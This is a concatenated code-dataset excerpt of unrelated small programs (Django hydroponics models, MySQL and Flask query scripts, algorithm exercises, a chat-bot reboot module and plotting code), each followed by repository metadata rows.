    def open(self):
        """True while the order still has unfilled shares and isn't cancelled."""
        return self.status == ORDER_STATUS.OPEN
    @property
    def triggered(self):
        """
        For a market order, True.
        For a stop order, True IFF stop_reached.
        For a limit order, True IFF limit_reached.
        """
        if self.stop is not None and not self.stop_reached:
            return False
        if self.limit is not None and not self.limit_reached:
            return False
        return True
    @property
    def open_amount(self):
        """Signed number of shares still to be filled."""
        return self.amount - self.filled
    def __repr__(self):
        """
        String representation for this object.
        """
        return "Order(%s)" % self.to_dict().__repr__()
    def __unicode__(self):
        """
        Unicode representation for this object.
        """
        return text_type(repr(self))
| [
"liu.jy.nku@gmail.com"
] | liu.jy.nku@gmail.com |
4cdb8d4ce152583225c607c387d527a82eced8d3 | 7c9707f0f1cb8e633ac605934f3dbd8036790868 | /projet/rpi_manager/models.py | f61c7c196096c5f2351a5ccd5919b2269e0b3f2e | [] | no_license | ometeore/hydropo | 891e1abd4c1b8ccd0a3b27a043abf894b70ceb5b | 324076d4b7ddbd14e718c424eb24d129c2a2243c | refs/heads/master | 2023-06-14T08:35:55.838469 | 2021-07-04T16:28:09 | 2021-07-04T16:28:09 | 290,198,666 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,146 | py | from django.db import models
from django import forms
from datetime import datetime
from channels.layers import get_channel_layer
from asgiref.sync import async_to_sync
class Rpi(models.Model):
name = models.CharField(max_length=200)
uid_name = models.CharField(max_length=200)
last_connect = models.DateTimeField()
is_conected = models.BooleanField()
# plutot que de comparer des str sources de bugs
# import datetime
# regler le passage a minuit aussi
# date_time_obj = datetime.datetime.strptime(date_time_str, '%Y-%m-%d %H:%M:%S.%f')
def compare_time(self, begin_test, end_test, cat):
if cat:
schedule = self.water.all()
else:
schedule = self.lights.all()
for times in schedule:
if begin_test > str(times.begin) and begin_test < str(times.end):
return False
if end_test > str(times.begin) and end_test < str(times.end):
return False
if begin_test < str(times.begin) and end_test > str(times.end):
return False
return True
def broadcast_schedule(self):
message = {}
message["manual"] = False
schedule_water_list = [
[str(elm.begin), str(elm.end)] for elm in self.water.all()
]
message["water"] = schedule_water_list
schedule_lights_list = [
[str(elm.begin), str(elm.end)] for elm in self.lights.all()
]
message["lights"] = schedule_lights_list
objectif_ph = self.ph.filter(objectif=True)
message["ph"] = objectif_ph[0].value
objectif_ec = self.ec.filter(objectif=True)
message["ec"] = objectif_ec[0].value
####### This part is sending the message to the websocket in group call "group0"
channel_layer = get_channel_layer()
async_to_sync(channel_layer.group_send)(
self.uid_name, {"type": "send_message", "message": message}
)
def broadcast_manual(self, tool):
message = {}
message["manual"] = True
message["tool"] = tool
print("ASK FOR MANUAL MODE FOR ID: {}".format(self.uid_name))
print(message)
channel_layer = get_channel_layer()
async_to_sync(channel_layer.group_send)(
self.uid_name, {"type": "send_message", "message": message}
)
class WaterSchedule(models.Model):
begin = models.TimeField()
end = models.TimeField()
rpi = models.ForeignKey(Rpi, on_delete=models.CASCADE, related_name="water")
class LightSchedule(models.Model):
begin = models.TimeField()
end = models.TimeField()
rpi = models.ForeignKey(Rpi, on_delete=models.CASCADE, related_name="lights")
class Ph(models.Model):
date = models.DateTimeField()
value = models.FloatField()
objectif = models.BooleanField()
rpi = models.ForeignKey(Rpi, on_delete=models.CASCADE, related_name="ph")
class Ec(models.Model):
date = models.DateTimeField()
value = models.IntegerField()
objectif = models.BooleanField()
rpi = models.ForeignKey(Rpi, on_delete=models.CASCADE, related_name="ec")
| [
"pilt64@hotmail.fr"
] | pilt64@hotmail.fr |
95414f7ed3b48f7baf6bd13799ea4698d7f6093f | 199522cb43b4e2c7e3bf034a0e604794258562b1 | /0x0F-python-object_relational_mapping/3-my_safe_filter_states.py | 3659d402edd14791ff0d3dce555884770499752c | [] | no_license | jormao/holbertonschool-higher_level_programming | a0fd92f2332f678e6fe496057c04f2995d24a4ac | 360b3a7294e9e0eadcadb57d4c48c22369c05111 | refs/heads/master | 2020-09-29T01:36:20.094209 | 2020-05-15T03:27:06 | 2020-05-15T03:27:06 | 226,915,744 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 607 | py | #!/usr/bin/python3
"""
script that takes in arguments and displays all values in the
states table of hbtn_0e_0_usa where name matches the argument.
But this time, write one that is safe from MySQL injections!
"""
import MySQLdb
from sys import argv
if __name__ == "__main__":
    # Connect with credentials from the command line:
    # argv[1] = user, argv[2] = password, argv[3] = database, argv[4] = state name.
    db = MySQLdb.connect(host="localhost", port=3306, user=argv[1],
                         passwd=argv[2], db=argv[3])
    cur = db.cursor()
    # Parameterized query: the driver escapes argv[4] for the %s placeholder,
    # which is what makes this version safe from SQL injection.
    cur.execute("SELECT * FROM states\
                WHERE name = %s\
                ORDER BY id", (argv[4],))
    rows = cur.fetchall()
    for row in rows:
        print(row)
    cur.close()
    db.close()
| [
"jormao@gmail.com"
] | jormao@gmail.com |
83b4ab7c3c4da8d9afb08d03fde9608fa04f4c09 | ea8e945af461ae6e5a2dcd9dce244391f14ec695 | /yamaguchi/chapter01/knock06.py | 60935e99d3fdfeb6fd7aaa78c8b5e626065af9d7 | [] | no_license | tmu-nlp/100knock2020 | b5a98485e52b88003fa97966c8d6eef292c9f036 | 1133fa833ea32ad3e54833e420bcb1433f3ec2f3 | refs/heads/master | 2023-04-09T06:48:04.571566 | 2020-08-13T05:38:25 | 2020-08-13T05:38:25 | 258,825,143 | 1 | 2 | null | 2020-08-12T15:56:56 | 2020-04-25T16:43:13 | Python | UTF-8 | Python | false | false | 371 | py | def n_gram(target, n):
    # Slide a window of width n along target; yields len(target)-n+1 grams
    # (works for both strings and lists).
    return [target[idx:idx + n] for idx in range(len(target) - n + 1)]
text_1 = "paraparaparadise"
text_2 = "paragraph"
# Character bigrams of each string.
X = n_gram(text_1, 2)
Y = n_gram(text_2, 2)
# Set algebra over the bigram sets: union, intersection, difference,
# then membership test for the bigram 'se'.
print(f'和集合: {set(X) | set(Y)}')
print(f'積集合: {set(X) & set(Y)}')
print(f'差集合: {set(X) - set(Y)}')
print("判定: " + str('se' in (set(X) & set(Y))))
"noreply@github.com"
] | noreply@github.com |
c026b6ef4d2e37bdbbe47238b809473c7ddfcf8e | d28ab4b215eda33a64dc81e40c824bc008680c18 | /python practice/Heap/373_find_k_pairs_with_smallest_sums.py | 43bea98c5177694695521bdaf8482168ff44fad2 | [] | no_license | SuzyWu2014/coding-practice | f7efc88c78877b841a4fcc8863a39223eca4c307 | 41365b549f1e6b04aac9f1632a66e71c1e05b322 | refs/heads/master | 2021-01-23T22:15:34.330828 | 2016-12-13T05:16:10 | 2016-12-13T05:16:10 | 58,106,714 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,867 | py | # 373. Find K Pairs with Smallest Sums
# You are given two integer arrays nums1 and nums2 sorted in ascending order and an integer k.
# Define a pair (u,v) which consists of one element from the first array and one element from the second array.
# Find the k pairs (u1,v1),(u2,v2) ...(uk,vk) with the smallest sums.
# Example 1:
# Given nums1 = [1,7,11], nums2 = [2,4,6], k = 3
# Return: [1,2],[1,4],[1,6]
# The first 3 pairs are returned from the sequence:
# [1,2],[1,4],[1,6],[7,2],[7,4],[11,2],[7,6],[11,4],[11,6]
# Example 2:
# Given nums1 = [1,1,2], nums2 = [1,2,3], k = 2
# Return: [1,1],[1,1]
# The first 2 pairs are returned from the sequence:
# [1,1],[1,1],[1,2],[2,1],[1,2],[2,2],[1,3],[1,3],[2,3]
# Example 3:
# Given nums1 = [1,2], nums2 = [3], k = 3
# Return: [1,3],[2,3]
# All possible pairs are returned from the sequence:
# [1,3],[2,3]
import heapq
class Solution(object):
    def kSmallestPairs(self, nums1, nums2, k):
        """Return the k pairs [u, v] (u from nums1, v from nums2) with the
        smallest sums, using a frontier min-heap.  O((n1 + k) log n1) time.

        :type nums1: List[int]
        :type nums2: List[int]
        :type k: int
        :rtype: List[List[int]]
        """
        k = min(k, len(nums1) * len(nums2))
        if k == 0:
            return []
        # Seed the frontier with (sum, i, j=0) for the first min(k, n1) rows;
        # each pop advances j within that row.
        frontier = [(nums1[i] + nums2[0], i, 0)
                    for i in range(min(k, len(nums1)))]
        heapq.heapify(frontier)
        pairs = []
        while len(pairs) < k:
            _, i, j = heapq.heappop(frontier)
            pairs.append([nums1[i], nums2[j]])
            if j + 1 < len(nums2):
                heapq.heappush(frontier, (nums1[i] + nums2[j + 1], i, j + 1))
        return pairs
# NOTE: Python 2 print statements (no parentheses) -- this script predates
# Python 3 and will not parse under a Python 3 interpreter as-is.
print Solution().kSmallestPairs([1, 2, 4, 5, 6], [3, 5, 7, 9], 3)
# print Solution().kSmallestPairs([1, 7, 11], [2, 4, 6], 3)
# print Solution().kSmallestPairs([1, 1, 2], [1, 2, 3], 2)
# print Solution().kSmallestPairs([1, 2], [3], 3)
# print Solution().kSmallestPairs([], [], 3)
| [
"shujinwu@oregonstate.edu"
] | shujinwu@oregonstate.edu |
03a6dcc503549409d4e92b79d56834442c467eaf | ddef88284b7ec08364f99b43d74a99410f49303e | /code/Assignment1_2D_RNG/2DRandomNoGens.py | 19636408deeb9df085d1eacb297e2e2b13a0fc7e | [] | no_license | IDS6145-Fall2019/assignment1-amajoy | 6f9094eb126055daf6fe9b4dcc162ca74abd7f7f | 5fb31ba4271f6f35b47c5c72e67ca136bb7ead82 | refs/heads/master | 2020-07-23T01:00:41.524726 | 2019-09-24T00:20:11 | 2019-09-24T00:20:11 | 207,392,730 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,450 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 21 21:54:35 2019
@author: Amanda
"""
import matplotlib.pyplot as plt
import random
import sobol_seq

# Figure layout: one column per sample size N; row 1 holds pseudo-random
# samples, row 2 quasi-random (Sobol) samples.  This replaces the previous
# copy-pasted stanza per subplot (the original comment even asked for a loop).
SAMPLE_SIZES = [100, 500, 1000, 2000, 5000]

for col, n in enumerate(SAMPLE_SIZES, start=1):
    # --- Row 1: pseudo-random points, uniform over [0, 4) x [0, 4) ---
    plt.subplot(2, 5, col)
    xs = [random.uniform(0, 4) for _ in range(n)]
    ys = [random.uniform(0, 4) for _ in range(n)]
    plt.title("N=%d" % n)
    if col == 1:
        plt.ylabel("Pseudo-Random")
    plt.scatter(xs, ys, s=1, marker='.')
    plt.yticks([])
    plt.xticks([])

    # --- Row 2: quasi-random (Sobol sequence) points in the unit square ---
    plt.subplot(2, 5, 5 + col)
    sobol_points = sobol_seq.i4_sobol_generate(4, n)
    if col == 1:
        plt.ylabel("Quasi Random")
    plt.scatter(sobol_points[:, 0], sobol_points[:, 1], s=1, marker='.')
    plt.yticks([])
    plt.xticks([])

plt.savefig("Plotting 2D RNG.png")
| [
"noreply@github.com"
] | noreply@github.com |
b1d93ea2d6cbc76b83a04f1dfc360dfdaf7bddcd | eb380d17c209c77adcb78240b6a03f64f3166d03 | /binfiles/dirs.py | 4074772dd54f6722c154d623a496a4db604662c7 | [] | no_license | abatkin/dotfiles | 2cee24e7b97d56d6cc15747ab4fff4f5a0743aa5 | 48ae654527c666013dd9b5f8a4c0e88335c0db43 | refs/heads/master | 2023-07-06T05:52:37.580612 | 2023-07-04T20:33:28 | 2023-07-04T20:33:28 | 8,023,147 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,568 | py | #!/usr/bin/env python3
import sys
import subprocess
import configparser
import argparse
import os
# Config sections that describe the app itself rather than a launchable entry.
SPECIAL_SECTIONS = ["app_config", "DEFAULT"]
# Registry mapping a section "type" value to its constructor (filled by @section_type).
SECTION_TYPES = {}
def launch(launch_string, arg):
    """Spawn the command described by *launch_string*, fully detached.

    The string is split on spaces; any "$" token is replaced by *arg*, and
    every token is ~-expanded before being passed to Popen.
    """
    def expand(token):
        return os.path.expanduser(arg if token == "$" else token)

    argv = [expand(token) for token in launch_string.split(" ")]
    # Detach completely: no inherited stdio, descriptors closed in the child.
    subprocess.Popen(argv, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, stdin=subprocess.DEVNULL, close_fds=True)
def open_folder(config, item):
    # Launch the configured file-manager command on the entry's path
    # (the "$" placeholder in folder_launcher receives the path).
    launch(config["folder_launcher"], item["path"])
def section_type(f):
    # Decorator: register *f* in SECTION_TYPES under its function name so a
    # config section can select it via `type = <name>`.
    section_name = f.__name__
    SECTION_TYPES[section_name] = f
    return f
@section_type
def folder(config, section_name, section):
    # Build a launchable "folder" entry from a config section.
    # NOTE(review): the lambda's parameter actually receives the item dict
    # itself (main calls item["launch"](item)), not a path string.
    return {
        "path": section["path"],
        "launch": lambda path: open_folder(config, path),
        "icon": section.get("icon", "folder"),
    }
def get_cli_args():
    """Parse CLI options: optional --config path and an optional command key."""
    parser = argparse.ArgumentParser(prog="dirs.py", description="Get extra launcher entries for rofi")
    parser.add_argument("--config", default="~/.config/launch-entries.ini", help="Configuration file")
    parser.add_argument("command_key", nargs="?", help="Key of command to run")
    return parser.parse_args()
def get_config_file(cli_args):
    """Load and parse the INI configuration file named by cli_args.config."""
    parser = configparser.ConfigParser()
    # Missing files are silently ignored by ConfigParser.read().
    parser.read(os.path.expanduser(cli_args.config))
    return parser
def section_to_item(config, section_name, section):
    """Convert one config section into a launcher item via its registered type."""
    section_type = section.get("type")
    if not section_type:
        print(f"missing 'type' in {section_name}")
        sys.exit(1)
    # NOTE(review): an unregistered type raises KeyError here rather than
    # printing a friendly message like the missing-type case above.
    section_constructor = SECTION_TYPES[section_type]
    return section_constructor(config, section_name, section)
def get_entries(config_file):
    """Build {section_name: item} for every non-special section of the config."""
    app_config = config_file["app_config"]
    entries = {}
    for name, section in config_file.items():
        if name not in SPECIAL_SECTIONS:
            entries[name] = section_to_item(app_config, name, section)
    return entries
def main():
    """Entry point: launch the entry named on the CLI, or — with no key —
    print one rofi menu row per entry (\\0icon\\x1f sets the row icon)."""
    cli_args = get_cli_args()
    config_file = get_config_file(cli_args)
    entries = get_entries(config_file)
    command_key = cli_args.command_key
    if command_key:
        if command_key not in entries:
            # Fixed the doubled word in the original message ("find find").
            print(f"Unable to find command with key {command_key}")
            sys.exit(1)
        item = entries[command_key]
        item["launch"](item)
    else:
        for k, v in entries.items():
            if "icon" in v:
                print(f"{k}\0icon\x1f{v['icon']}\n")
            else:
                print(f"{k}\n")
main()
| [
"adam@batkin.net"
] | adam@batkin.net |
8d171a5022415dbcc2597a1fcc88f810666aa159 | 227b4e6af73f56f7d17b79f9351b7b10b7b3c842 | /17/17-1-3.py | eefb39346e30e62a6379d1f4ac78e51939476103 | [] | no_license | phootip/advent-of-code-2018 | 32782e8525475efa2cc93c21e9c93d746483a71d | a335f2b333bb01caef6822592c051e3f13686d5d | refs/heads/master | 2022-12-10T15:01:50.349531 | 2018-12-28T17:26:30 | 2018-12-28T17:26:30 | 161,011,308 | 0 | 0 | null | 2022-12-08T01:38:12 | 2018-12-09T06:25:29 | Python | UTF-8 | Python | false | false | 2,813 | py | from PIL import Image, ImageDraw
# f = open('./17/17.txt')
f = open('./17.txt')
# f = open('17-test.txt')
nodes = [(500,0)]  # frontier of falling-water positions; the spring sits at x=500, y=0
revisit = []       # spill origins to re-check for settling after each fill pass
# maps[y][x]: '.' = sand, '#' = clay, '|' = flowing water, '~' = settled water
maps = [['.' for i in range(2000)] for j in range(2000)]
# Parse clay veins like "x=495, y=2..7" / "y=7, x=495..501" into '#' cells.
for line in f:
	line = line.strip().split(',')
	line = list(map(lambda x: x.strip().split('='),line))
	line[1][1] = list(map(int,line[1][1].split('..')))
	line[0][1] = int(line[0][1])
	p1 = line[0][1]
	p21 = line[1][1][0]
	p22 = line[1][1][1]
	if line[0][0] == 'x':
		for i in range(p21,p22+1):
			maps[i][p1] = '#'
	else:
		for i in range(p21,p22+1):
			maps[p1][i] = '#'
maps[0][500] = '|'  # mark the spring as flowing water
# Bounding box of all non-sand cells (used when drawing and counting).
minX, maxX = 2100,0
minY, maxY = 2100,0
for y in range(2000):
	for x in range(2000):
		if maps[y][x] != '.':
			minX = min(minX,x)
			maxX = max(maxX,x)
			minY = min(minY,y)
			maxY = max(maxY,y)
def draw():
	"""Render the map to ./visual/ans.png and return the number of water
	cells ('|' flowing + '~' settled) inside the clay bounding box."""
	ans = 0
	im = Image.new('RGB', (2000, 2000), color = 'white')
	draw = ImageDraw.Draw(im)
	for y in range(minY+1,maxY+1):
		for x in range(minX-1,maxX+2):
			# print(maps[y][x],end='')
			if(maps[y][x] == '|'):
				draw.rectangle([(x,y),(x,y)],fill='green')
				ans += 1
			elif(maps[y][x] == '#'):
				draw.rectangle([(x,y),(x,y)],fill='brown')
				ans += 0
			elif(maps[y][x] == '~'):
				draw.rectangle([(x,y),(x,y)],fill='blue')
				ans += 1
		# print()
	# im = im.crop((450,0,550,100))
	# im = im.resize((500,500))
	im.save(f"./visual/ans.png")
	return ans
def deadEnd(x,y,d):
	"""Scan horizontally from (x, y) in direction d along a supported row.

	Returns True when the scan reaches a clay wall (water can settle against
	it), False when the water can spill over an edge; the spill cell is
	queued on `nodes` and its origin on `revisit` for a later settle check.
	"""
	if(maps[y][x] == '|' and (maps[y+1][x] == '#' or maps[y+1][x] == '~')):
		return deadEnd(x+d,y,d)
	if(maps[y][x] == '#'):
		return True
	elif(maps[y][x] == '.'):
		maps[y][x] = '|'
		if(maps[y+1][x] == '#' or maps[y+1][x] == '~'):
			return deadEnd(x+d,y,d)
		elif(maps[y+1][x] == '.'):
			nodes.append((x,y+1))
			revisit.append((x,y))
			maps[y+1][x] = '|'
			return False
	return False
def still(x,y,d):
	"""Convert a horizontal run of flowing cells ('|') into settled water
	('~'), re-queueing any flowing cell directly above a settled one."""
	while(maps[y][x] == '|'):
		maps[y][x] = '~'
		if(maps[y-1][x] == '|'):
			nodes.append((x,y-1))
		x += d
def check(x,y,d):
	"""Return True if the flowing run starting at (x, y) in direction d ends
	at clay ('#'), False if it ends at open sand ('.')."""
	if(maps[y][x] == '|'):
		return check(x+d,y,d)
	if(maps[y][x] == '.'):
		return False
	if(maps[y][x] == '#'):
		return True
def cycle():
	"""Drain the `nodes` frontier once: let water fall through sand, and
	settle any row that turns out to be walled in on both sides."""
	while nodes:
		x,y = nodes.pop(0)
		if(y > maxY):
			continue
		if(maps[y+1][x] == '.'):
			nodes.append((x,y+1))
			maps[y+1][x] = '|'
		elif(maps[y+1][x] == '#' or maps[y+1][x] == '~'):
			right = deadEnd(x+1,y,1)
			left = deadEnd(x-1,y,-1)
			if right and left:
				still(x,y,1)
				still(x-1,y,-1)
	return True
# Alternate fill passes with re-checks of previously spilled rows until the
# frontier is exhausted, then render the map and report the water totals.
while nodes:
	temp = revisit[:]
	cycle()
	for x,y in revisit:
		right = check(x+1,y,1)
		left = check(x-1,y,-1)
		if( right and left ):
			still(x,y,1)
			still(x-1,y,-1)
ans = draw()
print(minX,minY)
print(maxX,maxY)
print(ans)
# print(ans - 1)
"phootip.t@gmail.com"
] | phootip.t@gmail.com |
0352eb84ce1933e896691dcfd8d602529a7c6ac8 | 6e66abb51d4d4bbf3c335e19530d439c2615ff4e | /deepfake/deepfake/skp/etl/compute_image_hashes.py | 8442a845e134be8e0c3d046f7232de52cda984f1 | [] | no_license | yihhan/3dcnn_code | 19ed5aafe62e7e53c259dedd724b9e970940a870 | 3483e2840c68e69a90304dc4922657e0e9a590d8 | refs/heads/main | 2023-07-31T04:37:00.616853 | 2021-09-20T03:21:07 | 2021-09-20T03:21:07 | 408,280,559 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,445 | py | import pandas as pd
import numpy as np
import decord
import imagehash
import glob, os, os.path as osp
from tqdm import tqdm
from PIL import Image
def load_video(filename, max_frames=100):
    """Decode the first *max_frames* frames of a video into one
    (frames, H, W, C) uint8 ndarray using decord on the CPU."""
    reader = decord.VideoReader(filename, ctx=decord.cpu())
    frames = [reader[index].asnumpy() for index in range(max_frames)]
    return np.asarray(frames)
def compute_hashes(x, y):
    """Return the perceptual-hash distances between two frames as a list,
    one entry per algorithm: average hash, pHash, dHash, wHash."""
    algorithms = (imagehash.average_hash, imagehash.phash,
                  imagehash.dhash, imagehash.whash)
    image_a = Image.fromarray(x.astype('uint8'))
    image_b = Image.fromarray(y.astype('uint8'))
    return [algorithm(image_a) - algorithm(image_b) for algorithm in algorithms]
VIDEODIR = '/home/ianpan/ufrc/deepfake/data/dfdc/videos/'
videos = glob.glob(osp.join(VIDEODIR, '*/*.mp4'))
df = pd.read_csv('/home/ianpan/ufrc/deepfake/data/dfdc/train.csv')
df = df[df['label'] == 'FAKE']
# For every fake video, compare it frame-by-frame against its source
# ("original") video and record the four hash distances per frame pair.
hash_diffs = {}
for orig, _df in tqdm(df.groupby('original'), total=len(df['original'].unique())):
    # The original lives in the same directory as its fakes; swap filenames.
    orig_filepath = _df['filepath'].iloc[0].replace(_df['filename'].iloc[0], orig)
    orig_video = load_video(osp.join(VIDEODIR, orig_filepath))
    for fake_rownum, fake_row in _df.iterrows():
        fake_video = load_video(osp.join(VIDEODIR, fake_row['filepath']))
        hash_diffs[fake_row['filename']] = []
        for real_frame, fake_frame in zip(orig_video, fake_video):
            hash_diffs[fake_row['filename']].append(compute_hashes(real_frame, fake_frame))
| [
"tanyihhan@gmail.com"
] | tanyihhan@gmail.com |
6700c063471e30cfe487dee40901fad3323c7060 | 404ad77945e7ff8a57dac8753b00cb7187bd7f4e | /105/001.py | dce8d85ee6ea0834af75a97b3fa8fd5befcc6430 | [] | no_license | dennisliuu/Coding-365 | 5d773493fbf69bce03de20e4a03c5fdf108612f6 | 8e1cab65837ebe2cb36fa0e4b74fb07d0ee6b081 | refs/heads/master | 2020-03-24T22:33:58.299791 | 2018-08-07T05:06:21 | 2018-08-07T05:06:21 | 143,091,281 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,241 | py | class Stack:
def __init__(self):
self.items = []
def isEmpty(self):
return self.items == []
def push(self, item):
self.items.append(item)
def pop(self):
return self.items.pop()
def peek(self):
return self.items[len(self.items) - 1]
def size(self):
return len(self.items)
class CircularQueue:
# Constructor
def __init__(self):
self.queue = list()
self.head = 0
self.tail = 0
self.maxSize = 5
# Adding elements to the queue
def enqueue(self, data):
self.queue.append(data)
self.tail = (self.tail + 1) % self.maxSize
# Removing elements from the queue
def dequeue(self):
data = self.queue[self.head]
self.head = (self.head + 1) % self.maxSize
return data
# Calculating the size of the queue
def size(self):
if self.tail >= self.head:
return (self.tail - self.head)
return (self.maxSize - (self.head - self.tail))
lst = []
s = Stack()
Select = input()
if Select == '1':
s = Stack()
while 1:
mov = input().split(' ')
if mov[0] == '1':
if s.size() > 4:
print("FULL")
break
else:
s.push(int(mov[1]))
elif mov[0] == '2':
if s.size() == 0:
print("EMPTY")
break
else:
print(s.pop(), s.size())
elif mov[0] == '3':
while s.isEmpty() is False:
# print(s.pop())
lst.append(s.pop())
lst = reversed(lst)
print(*lst)
break
elif Select == '2':
q = CircularQueue()
while 1:
mov = input().split(' ')
if mov[0] == '1':
if q.size() < 4:
q.enqueue(int(mov[1]))
else:
print("FULL")
break
elif mov[0] == '2':
if q.size() > 0:
q.dequeue()
else:
print("EMPTY")
break
elif mov[0] == '3':
while q.size() != 0:
lst.append(q.dequeue())
print(*lst)
break | [
"dennisliuu@gmail.com"
] | dennisliuu@gmail.com |
0ac0305052893eb0942f039d2bc543f72d5454e5 | cf09d6430e37b5460d7208d6cae6d3af0fa15925 | /jsonbot/jsb/lib/reboot.py | 9209bd73573898a076abeb23cc8bd8fa26b3fd6a | [
"MIT"
] | permissive | Lujeni/old-projects | 2bbf0ff89852a3e4a9677475a615d2ee4b07d635 | 657304c8b017a98935de9728fc695abe8be7cc4f | refs/heads/master | 2021-03-12T23:08:34.054777 | 2014-10-16T23:10:15 | 2014-10-16T23:10:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,632 | py | # jsb/reboot.py
#
#
""" reboot code. """
## jsb imports
from jsb.lib.fleet import getfleet
from jsb.imports import getjson
json = getjson()
## basic imports
import os
import sys
import pickle
import tempfile
import logging
import time
## reboot function
def reboot():
""" reboot the bot. """
logging.warn("reboot - rebooting")
os.execl(sys.argv[0], *sys.argv)
## reboot_stateful function
def reboot_stateful(bot, ievent, fleet, partyline):
""" reboot the bot, but keep the connections (IRC only). """
logging.warn("reboot - doing statefull reboot")
session = {'bots': {}, 'name': bot.cfg.name, 'channel': ievent.channel, 'partyline': []}
fleet = getfleet()
for i in fleet.bots:
logging.warn("reboot - updating %s" % i.cfg.name)
data = i._resumedata()
if not data: continue
session['bots'].update(data)
if i.type == "sxmpp": i.exit() ; continue
if i.type == "convore": i.exit() ; continue
if i.type == "tornado":
i.exit()
time.sleep(0.1)
for socketlist in i.websockets.values():
for sock in socketlist: sock.stream.close()
session['partyline'] = partyline._resumedata()
sfile, sessionfile = tempfile.mkstemp('-session', 'jsb-', text=True)
logging.warn("writing session file %s" % sessionfile)
json.dump(session, open(sessionfile, "w"))
args = []
skip = False
for a in sys.argv[1:]:
if skip: skip = False ; continue
if a == "-r": skip = True ; continue
args.append(a)
os.execl(sys.argv[0], sys.argv[0], '-r', sessionfile, *args)
| [
"julien@thebault.co"
] | julien@thebault.co |
318d59a2c7fd3d07c465da350c7d3b65dd8f4934 | 91d1a6968b90d9d461e9a2ece12b465486e3ccc2 | /ivs_write_f/playback-key-pair_import.py | e6227c4b54f4786793a1d735b01d2cf516e72ad9 | [] | no_license | lxtxl/aws_cli | c31fc994c9a4296d6bac851e680d5adbf7e93481 | aaf35df1b7509abf5601d3f09ff1fece482facda | refs/heads/master | 2023-02-06T09:00:33.088379 | 2020-12-27T13:38:45 | 2020-12-27T13:38:45 | 318,686,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 773 | py | #!/usr/bin/python
# -*- codding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import write_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-instances.html
if __name__ == '__main__':
"""
delete-playback-key-pair : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ivs/delete-playback-key-pair.html
get-playback-key-pair : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ivs/get-playback-key-pair.html
list-playback-key-pairs : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ivs/list-playback-key-pairs.html
"""
write_parameter("ivs", "import-playback-key-pair") | [
"hcseo77@gmail.com"
] | hcseo77@gmail.com |
a4b3840315ea96ca28729257ee1a111f26226833 | 87d87c3c621c7f49cb1e7a5a4405aed4ee333857 | /.venv/bin/pip3.6 | 3c859a8ef91b0e61ab44a7c932c77a6958f7b3c6 | [] | no_license | victor-s-santos/Workshopgenetica | 32296f4b04216013562720688b14eb7fdb2877eb | 79233821b8919a564e37e0b6961c4e64b65797e8 | refs/heads/master | 2021-06-20T14:58:58.110529 | 2019-06-19T19:31:48 | 2019-06-19T19:31:48 | 192,790,662 | 0 | 0 | null | 2021-06-10T21:36:24 | 2019-06-19T19:17:23 | Python | UTF-8 | Python | false | false | 237 | 6 | #!/home/victor/Django/unesp_apps/.venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"victorsantos.py@gmail.com"
] | victorsantos.py@gmail.com |
3e4e5435d302503d3bc1b51a2fe2084deea94028 | ca4d1f815784ce137c27b2ddfe6515ca0cf7b5b5 | /python/IKnow/iknowFlask.py | c96850eb52cc67debe8c2dad0ceed73310f6f785 | [] | no_license | jacobL/iknow | 152a2d905c0178cbd7d907c2a0d4546ede3c6abb | 135000f94cac4dc450006eddc94415edd0ac3a6e | refs/heads/main | 2023-05-30T16:56:31.668948 | 2021-06-25T07:43:49 | 2021-06-25T07:43:49 | 380,092,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 108,885 | py | from flask import Flask
from flask import jsonify
from flask import request
from flask_cors import CORS, cross_origin
from collections import OrderedDict
from werkzeug.serving import run_simple
import pymysql
import pyodbc
import datetime
import time
import json
app = Flask(__name__)
app.config['JSON_SORT_KEYS'] = True
CORS(app)
@app.route("/toplist1", methods=['GET'])
def toplist1():
PERNR = request.args.get('PERNR');
deptSystem = request.args.get('deptSystem').lower();
returnData = OrderedDict();
TopN = 5
if deptSystem == 'mq' : # deptSystem = 2
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'mq')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from mq_chat_log_new s join mq_standand_question t on s.answerNo=t.Answer_NO group by answerNo) a, (select count(1) total from mq_chat_log_new) b order by c desc limit %s",(TopN))
elif deptSystem == 'qs' : # deptSystem = 4
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'qs')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from qs_chat_log_new s join qs_standand_question t on s.answerNo=t.Answer_NO group by answerNo) a, (select count(1) total from qs_chat_log_new) b order by c desc limit %s",(TopN))
elif deptSystem == 'qmd' : # deptSystem = 5
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'qs')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from qmd_chat_log_new s join qmd_standand_question t on s.answerNo=t.Answer_NO group by answerNo) a, (select count(1) total from qmd_chat_log_new) b order by c desc limit %s",(TopN))
elif deptSystem == 'rma' : # deptSystem = 6
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'rma')
cur = conn.cursor()
